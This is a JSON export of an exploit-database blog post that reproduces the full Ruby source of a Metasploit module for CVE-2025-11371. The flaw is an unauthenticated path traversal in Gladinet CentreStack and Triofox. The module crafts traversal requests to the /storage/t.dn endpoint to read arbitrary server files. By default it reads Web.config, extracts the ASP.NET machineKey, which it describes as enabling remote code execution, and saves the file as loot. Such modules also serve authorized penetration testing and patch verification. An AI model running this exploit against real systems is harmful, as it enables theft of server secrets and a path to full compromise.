{"id":39104,"date":"2026-02-04T13:51:46","date_gmt":"2026-02-04T13:51:46","guid":{"rendered":"http:\/\/localhost\/?p=39104"},"modified":"2026-02-04T13:51:46","modified_gmt":"2026-02-04T13:51:46","slug":"gladinet-centrestacktriofox-path-traversal","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=39104","title":{"rendered":"Gladinet CentreStack\/Triofox Path Traversal_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_PATH_TRAVERSAL_CVE_2025_11371-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-04T19:28:01&#8243;,&#8221;description&#8221;:&#8221;This module exploits a path traversal vulnerability CVE-2025-11371 in Gladinet CentreStack and Triofox that allows an unauthenticated attacker to read arbitrary files from the server&#8217;s file system. The vulnerability exists in the \/storage\/t.dn endpoint&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-04T18:58:58&#8243;,&#8221;modified&#8221;:&#8221;2026-02-04T18:58:58&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Gladinet CentreStack\/Triofox Path Traversal&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:AUXILIARY-GATHER-GLADINET_STORAGE_PATH_TRAVERSAL_CVE_2025_11371-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-11371&#8243;,&#8221;CVE-2025-30406&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n  include Msf::Exploit::Remote::HttpClient\\n  include Msf::Auxiliary::Report\\n  include Msf::Auxiliary::Gladinet\\n  prepend Msf::Exploit::Remote::AutoCheck\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Gladinet CentreStack\/Triofox Path Traversal&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module exploits a path traversal vulnerability (CVE-2025-11371) in\\n          Gladinet CentreStack and Triofox that allows an unauthenticated attacker to read\\n          arbitrary files from the server&#8217;s file system.\\n\\n          The vulnerability exists in the `\/storage\/t.dn` endpoint which does not properly\\n          sanitize the `s` parameter, allowing path traversal attacks. This can be used\\n          to read sensitive files such as Web.config which contains the machineKey used for\\n          ViewState deserialization attacks (CVE-2025-30406).\\n\\n          Gladinet CentreStack versions up to 16.10.10408.56683 are vulnerable.\\n          Gladinet Triofox versions up to 16.10.10408.56683 are vulnerable.\\n        },\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;Huntress Team&#8217;, # Vulnerability discovery\\n          &#8216;Valentin Lobstein \\u003cchocapikk[at]leakix.net\\u003e&#8217;, # Metasploit module\\n          &#8216;Julien Voisin&#8217;, # Review\\n          &#8216;jheysel-r7&#8217; # Review\\n        ],\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;CVE&#8217;, &#8216;2025-11371&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/www.huntress.com\/blog\/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild&#8217;]\\n        ],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-04-03&#8217;,\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS],\\n          &#8216;Reliability&#8217; =\\u003e []\\n        },\\n        &#8216;Actions&#8217; =\\u003e [\\n          [&#8216;READ_FILE&#8217;, { &#8216;Description&#8217; =\\u003e &#8216;Read an arbitrary file from the target&#8217; }],\\n          [&#8216;EXTRACT_MACHINEKEY&#8217;, { &#8216;Description&#8217; =\\u003e &#8216;Read Web.config and extract the machineKey for RCE&#8217; }]\\n        ],\\n        &#8216;DefaultAction&#8217; =\\u003e &#8216;EXTRACT_MACHINEKEY&#8217;\\n      )\\n    )\\n\\n    register_options([\\n      OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;The base path to the Gladinet CentreStack or Triofox application&#8217;, &#8216;\/&#8217;]),\\n      OptString.new(&#8216;FILEPATH&#8217;, [true, &#8216;The file to read on the target&#8217;, &#8216;Program Files (x86)\\\\\\\\Gladinet Cloud Enterprise\\\\\\\\root\\\\\\\\Web.config&#8217;]),\\n      OptString.new(&#8216;DEPTH&#8217;, [true, &#8216;Path traversal depth (number of ..\\\\\\\\ sequences)&#8217;, &#8216;..\\\\\\\\..\\\\\\\\..\\\\\\\\&#8217;])\\n    ])\\n  end\\n\\n  def build_traversal_path(file_path)\\n    # Remove C:\\\\ prefix if present (path traversal doesn&#8217;t work with drive letters)\\n    normalized_path = file_path.gsub(\/^[A-Z]:\\\\\\\\\/, &#8221;).gsub(\/^[A-Z]:\/, &#8221;)\\n    \\&#8221;#{datastore[&#8216;DEPTH&#8217;]}#{normalized_path.gsub(&#8216; &#8216;, &#8216;+&#8217;)}\\&#8221;\\n  end\\n\\n  def send_traversal_request(file_path)\\n    traversal_path = build_traversal_path(file_path)\\n\\n    send_request_cgi({\\n      &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;storage&#8217;, &#8216;t.dn&#8217;),\\n      &#8216;vars_get&#8217; =\\u003e { &#8216;s&#8217; =\\u003e traversal_path, &#8216;sid&#8217; =\\u003e &#8216;1&#8217; },\\n      &#8216;encode_params&#8217; =\\u003e false\\n    })\\n  end\\n\\n  def check\\n    version = gladinet_version\\n    return Exploit::CheckCode::Detected(&#8216;Gladinet detected but version could not be determined&#8217;) if version.nil?\\n\\n    rex_version = Rex::Version.new(version)\\n    return Exploit::CheckCode::Vulnerable(\\&#8221;Path traversal vulnerability confirmed (Build #{version})\\&#8221;) if rex_version \\u003c= Rex::Version.new(&#8216;16.10.10408.56683&#8217;)\\n\\n    Exploit::CheckCode::Detected(\\&#8221;Version #{version} detected, attempting path traversal anyway\\&#8221;)\\n  end\\n\\n  def read_file(file_path)\\n    print_status(\\&#8221;Attempting to read file via path traversal: #{file_path}\\&#8221;)\\n\\n    res = send_traversal_request(file_path)\\n    return nil unless res\\u0026.code == 200\\n\\n    res.body\\n  end\\n\\n  def run\\n    case action.name\\n    when &#8216;READ_FILE&#8217;\\n      run_read_file\\n    when &#8216;EXTRACT_MACHINEKEY&#8217;\\n      run_extract_machinekey\\n    end\\n  end\\n\\n  def run_read_file\\n    file_content = read_file(datastore[&#8216;FILEPATH&#8217;])\\n    return print_error(&#8216;Failed to read file via path traversal&#8217;) if file_content.nil? || file_content.empty?\\n\\n    print_good(\\&#8221;Successfully read file: #{datastore[&#8216;FILEPATH&#8217;]}\\&#8221;)\\n    print_line\\n    print_line(file_content)\\n    print_line\\n\\n    fname = File.basename(datastore[&#8216;FILEPATH&#8217;])\\n    path = store_loot(\\n      &#8216;gladinet.file&#8217;,\\n      &#8216;text\/plain&#8217;,\\n      datastore[&#8216;RHOST&#8217;],\\n      file_content,\\n      fname,\\n      &#8216;File read from Gladinet via path traversal (CVE-2025-11371)&#8217;\\n    )\\n    print_good(\\&#8221;File saved to: #{path}\\&#8221;)\\n  end\\n\\n  def run_extract_machinekey\\n    file_content = read_file(datastore[&#8216;FILEPATH&#8217;])\\n    return print_error(&#8216;Failed to read file via path traversal&#8217;) if file_content.nil? || file_content.empty?\\n\\n    print_good(\\&#8221;Successfully read file: #{datastore[&#8216;FILEPATH&#8217;]}\\&#8221;)\\n    print_line\\n    print_line(file_content)\\n    print_line\\n\\n    fname = File.basename(datastore[&#8216;FILEPATH&#8217;])\\n    path = store_loot(\\n      &#8216;gladinet.file&#8217;,\\n      &#8216;text\/plain&#8217;,\\n      datastore[&#8216;RHOST&#8217;],\\n      file_content,\\n      fname,\\n      &#8216;File read from Gladinet via path traversal (CVE-2025-11371)&#8217;\\n    )\\n    print_good(\\&#8221;File saved to: #{path}\\&#8221;)\\n\\n    handle_machinekey_extraction(file_content, datastore[&#8216;FILEPATH&#8217;], &#8216;MachineKey extracted from Gladinet Web.config (CVE-2025-11371)&#8217;)\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/gather\/gladinet_storage_path_traversal_cve_2025_11371.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/gather\/gladinet_storage_path_traversal_cve_2025_11371\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-04T19:28:01&#8243;,&#8221;description&#8221;:&#8221;This module exploits a path traversal vulnerability CVE-2025-11371 in Gladinet CentreStack and Triofox that allows an unauthenticated attacker to read arbitrary files from the server&#8217;s&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-39104","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Gladinet CentreStack\/Triofox Path Traversal_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_PATH_TRAVERSAL_CVE_2025_11371- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=39104\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Gladinet CentreStack\/Triofox Path Traversal_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_PATH_TRAVERSAL_CVE_2025_11371- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-04T19:28:01&#8243;,&#8221;description&#8221;:&#8221;This module exploits a path traversal vulnerability CVE-2025-11371 in Gladinet CentreStack and Triofox that allows an unauthenticated attacker to read arbitrary files from the server&#8217;s...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=39104\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-04T13:51:46+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39104#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39104\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Gladinet CentreStack\\\/Triofox Path Traversal_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_PATH_TRAVERSAL_CVE_2025_11371-\",\"datePublished\":\"2026-02-04T13:51:46+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39104\"},\"wordCount\":983,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39104#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39104\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39104\",\"name\":\"Gladinet CentreStack\\\/Triofox Path Traversal_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_PATH_TRAVERSAL_CVE_2025_11371- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-04T13:51:46+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39104#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39104\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39104#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Gladinet CentreStack\\\/Triofox Path Traversal_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_PATH_TRAVERSAL_CVE_2025_11371-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Gladinet CentreStack\/Triofox Path Traversal_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_PATH_TRAVERSAL_CVE_2025_11371- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=39104","og_locale":"en_US","og_type":"article","og_title":"Gladinet CentreStack\/Triofox Path Traversal_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_PATH_TRAVERSAL_CVE_2025_11371- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-04T19:28:01&#8243;,&#8221;description&#8221;:&#8221;This module exploits a path traversal vulnerability CVE-2025-11371 in Gladinet CentreStack and Triofox that allows an unauthenticated attacker to read arbitrary files from the server&#8217;s...","og_url":"https:\/\/zero.redgem.net\/?p=39104","og_site_name":"zero redgem","article_published_time":"2026-02-04T13:51:46+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=39104#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=39104"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Gladinet CentreStack\/Triofox Path Traversal_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_PATH_TRAVERSAL_CVE_2025_11371-","datePublished":"2026-02-04T13:51:46+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=39104"},"wordCount":983,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=39104#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=39104","url":"https:\/\/zero.redgem.net\/?p=39104","name":"Gladinet CentreStack\/Triofox Path Traversal_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_PATH_TRAVERSAL_CVE_2025_11371- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-04T13:51:46+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=39104#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=39104"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=39104#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Gladinet CentreStack\/Triofox Path Traversal_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_PATH_TRAVERSAL_CVE_2025_11371-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39104","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39104"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39104\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39104"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=39104"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=39104"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}